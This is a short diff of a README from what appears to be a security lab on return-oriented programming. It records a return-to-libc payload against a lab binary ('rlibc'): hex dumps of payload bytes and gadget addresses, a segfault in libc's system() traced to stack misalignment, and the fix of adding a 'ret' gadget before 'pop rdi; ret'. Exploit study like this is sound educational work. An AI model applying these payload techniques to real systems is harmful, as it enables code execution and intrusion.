lwerdna/workbench/105-pub-ro-cns-lab08-rop/README.txt

 00000080: bbbbbbbbbbbbbbbb 00005555555551eb  .........QUUUU..
 00000090: 00007ffff7dd8678 00007ffff7c50d70  x.......p.......

-./rlibc2 < payload.bin
+./rlibc < payload.bin
 Segmentation fault (core dumped)

 Under GDB, fault is at:
 0x7ffff7c50973 <do_system+115>:	movaps XMMWORD PTR [rsp],xmm1

-Brilliant question+answer by shaqed: https://stackoverflow.com/questions/54393105/libcs-system-when-the-stack-pointer-is-not-16-padded-causes-segmentation-faul
+Thanks to brilliant Q&A by shaqed, we learn this an alignment issue: https://stackoverflow.com/questions/54393105/libcs-system-when-the-stack-pointer-is-not-16-padded-causes-segmentation-faul

-To bump RSP by 8, we can add a nop gadget, and bounce to a ret, the one after pop rdi.
+To bump RSP by 8, to align, we can add a nop gadget, and bounce to a ret, the one after pop rdi.

 00005555555551ec "ret"
 00005555555551eb "pop rdi; ret"